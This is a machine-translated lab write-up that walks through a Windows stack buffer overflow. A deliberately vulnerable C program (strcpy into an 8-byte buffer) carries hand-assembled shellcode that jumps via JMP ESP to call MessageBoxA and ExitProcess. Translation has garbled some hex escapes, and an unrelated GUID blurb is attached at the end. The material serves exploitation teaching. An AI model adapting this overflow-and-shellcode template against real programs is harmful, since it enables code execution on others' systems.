Buffer overflow utilization and shellcode writing

Time:2022-5-9

IExperimental purpose

  1. Familiar with the process of writing shellcode
  2. Master the utilization of buffer overflow

IIExperimental environment

  1. System environment: Windows Environment
  2. Software environment: C + +,Buffer overflow file link

IIIExperimental principle

  1. To implement an effective buffer overflow attack, an attacker must complete the following tasks:
    (1) Appropriate code (called shellcode) is implanted into the address space of the program to complete illegal tasks such as obtaining system control.
    (2) By modifying the register or memory, the program execution stream can jump to the shellcode address space implanted by the attacker for execution.
  2. In the specific implementation, we complete the buffer overflow in three steps:
    (1). Find the exact location of the return address
    (2). Find a suitable address to overwrite the original address
    (3). Write shellcode to the corresponding buffer
    (4). Write shellcode to pop up the attack dialog box

IVExperimental steps

  • To exploit the buffer overflow vulnerability, we first need to accurately find the location of the return address
    Open the windows 7 virtual machine and write an overrun DSW project file, the code is as follows:
#include "string.h"
#include "stdio.h"
#include "windows.h"	
char name[] = "ABCDEFGH"
			"IJKL"
			"\ XB3 \ X00 \ X00 \ X00" // fill in the obtained JMP ESP instruction address
			"\x33\xDB" //xor ebx,ebx
			"\x53"     //push ebx  				
			"\x68\x69\x6E\x67\x20"//push 0x20676e69
			"\x68\x57\x61\x72\x6E"//push 0x6e726157				
			"\x8B\xC4"  //mov eax,esp
			"\x53"  //push ebx
			"\x68\x21\x20\x20\x20"//push 0x20202021
			"\x68\x63\x6b\x65\x64"//push 0x64656b63
			"\x68\x6e\x20\x68\x61"//push 0x6168206e
			"\x68\x20\x62\x65\x65"//push 0x65656220
                        "\x68\x68\x61\x76\x65"//push 0x65766168
			"\x68\x59\x6f\x75\x20"//push 0x20756f59
			"\x8B\xCC" //mov ecx,esp
			"\x53"//push ebx
			"\x50"//push eax
			"\x51"//push ecx
			"\x53"//push ebx
			"\ xb8 \ X00 \ X00 \ X00 \ X00" // messageboxa address assigned to eax
			"\xFF\xD0" //call eax
			"\x53" //push ebx
			"\ xb8 \ X00 \ X00 \ X00 \ X00" // assign the address of the ExitProcess function obtained in the previous experiment to eax
			"\xFF\xD0"; //call eax;

	int main()
	{
		char buffer[8];
		LoadLibrary("user32.dll");
		strcpy(buffer,name);
		printf("%s\n",buffer);
		getchar();
		return 0;
	}
  • Get JMP ESP instruction address:
    Open the buffer overflow folder – find the searchjmp folder and load searhjmpesp DSW file. Run the program, which lists the address of JMP ESP instruction. We randomly select the address of a JMP ESP, for example: 0x75a0a0b3, as shown in the figure below:Get JMP ESP instruction address

  • Get the address of dialog box function (injection function):
    To call the messageboxa dialog box through a vulnerability, first obtain the address of the relevant function, double-click to open the buffer overflow folder – find the searchjmp folder and load serchfunctionaddr DSW file, run the program. Get the address of the corresponding function. The address of function messageboxa is 0x759aea11, and the address of function ExitProcess is 0x76e0214f. As shown in figure 2-2-3. (modify the code to get the addresses of other API functions) in order to make the overflow program close normally, we alsoGot the address of ExitProcess function

  • The JMP ESP instruction address and the dialog box function (injection function) address will be obtained, replacing overrun In cpp fileJMP ESP instruction address and messageboxa and ExitProcess address

#include "string.h"
#include "stdio.h"
#include "windows.h"	
char name[] = "ABCDEFGH"
			"IJKL"
			"\ XB3 \ xa0 \ xa0 \ x75" // fill in the obtained JMP ESP instruction address
			"\x33\xDB" //xor ebx,ebx
			"\x53"     //push ebx  				
			"\x68\x69\x6E\x67\x20"//push 0x20676e69
			"\x68\x57\x61\x72\x6E"//push 0x6e726157				
			"\x8B\xC4"  //mov eax,esp
			"\x53"  //push ebx
			"\x68\x21\x20\x20\x20"//push 0x20202021
			"\x68\x63\x6b\x65\x64"//push 0x64656b63
			"\x68\x6e\x20\x68\x61"//push 0x6168206e
			"\x68\x20\x62\x65\x65"//push 0x65656220
                        "\x68\x68\x61\x76\x65"//push 0x65766168
			"\x68\x59\x6f\x75\x20"//push 0x20756f59
			"\x8B\xCC" //mov ecx,esp
			"\x53"//push ebx
			"\x50"//push eax
			"\x51"//push ecx
			"\x53"//push ebx
			"\ xb8 \ X11 \ xea \ x9a \ x75" // messageboxa address assigned to eax
			"\xFF\xD0" //call eax
			"\x53" //push ebx
			"\ xb8 \ x4f \ X21 \ xe0 \ x76" // assign the address of ExitProcess function obtained in the previous experiment to eax
			"\xFF\xD0"; //call eax;

	int main()
	{
		char buffer[8];
		LoadLibrary("user32.dll");
		strcpy(buffer,name);
		printf("%s\n",buffer);
		getchar();
		return 0;
	}
  • Run overrun CPP program, press the space, and the dialog box pops up successfully. As shown in the figure below:

Recommended Today

JS generate guid method

JS generate guid method https://blog.csdn.net/Alive_tree/article/details/87942348 Globally unique identification(GUID) is an algorithm generatedBinaryCount Reg128 bitsNumber ofidentifier , GUID is mainly used in networks or systems with multiple nodes and computers. Ideally, any computational geometry computer cluster will not generate two identical guids, and the total number of guids is2^128In theory, it is difficult to make two […]